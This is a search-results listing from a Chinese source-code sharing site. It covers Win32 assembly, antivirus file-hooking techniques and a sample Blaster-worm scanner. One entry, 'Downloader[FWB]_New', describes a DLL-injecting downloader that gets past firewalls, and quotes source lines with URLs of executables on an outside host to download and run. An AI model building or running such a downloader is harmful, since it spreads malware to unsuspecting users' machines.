搜索资源列表
Windows环境下32位汇编语言
- 本书从简单的例子开始,逐步深入到windows平台汇编语言方方面面.汇集了作者深厚的win32汇编经验!-this book from a simple example, the gradual deepening of the windows platform assembly language aspects. The authors pooled deep win32 Series experience.
杀毒软件实时杀毒的奥秘(含源程序)
- 市面上所有号称\"虚拟机\",\"_blank\",防火墙\"的实时监控杀毒软件无一不是使用的IFSHOOK技术.下面给出用VTOOLSD写的代码.也就是所有实时杀毒软件的奥秘.同时,很多拦截文件操作的软件,例如对目录加密,文件加密等,也采用了雷同的技术. -market called "virtual machine", "_blank" firewall "real-time monitoring of antivirus software
Downloader[FWB]_New
- 编译说明:{ 程序采用DLL插入--9x 和NT下都可以插入 穿防火墙,可以自定义三条连接 后面两个还可以休眠5秒后运行--具体看代码 程序编译压缩后只有2.7k } 首先打开dlldownloader.asm文件~ url1s byte http://www.Anskya.Net/1.exe , 0 url2s byte http://www.Anskya.Net/2.exe , 0 url3s byte http://www.Anskya.Net/2.ex
Antivirussoftware
- 本程序只是简单介绍杀毒软件的编写方法,所以有很多不完善的地方,包括: 1,本程序是以冲击波蠕虫做的例子 2,文件遍历只搜索了 s目录下的文件 3,本程序不能查杀冲击波变种 本程序只是用做代码交流,如有错误,还请多多包含! -This procedure is a simple introduction of antivirus software compiling method, so there are many imperfect places, including: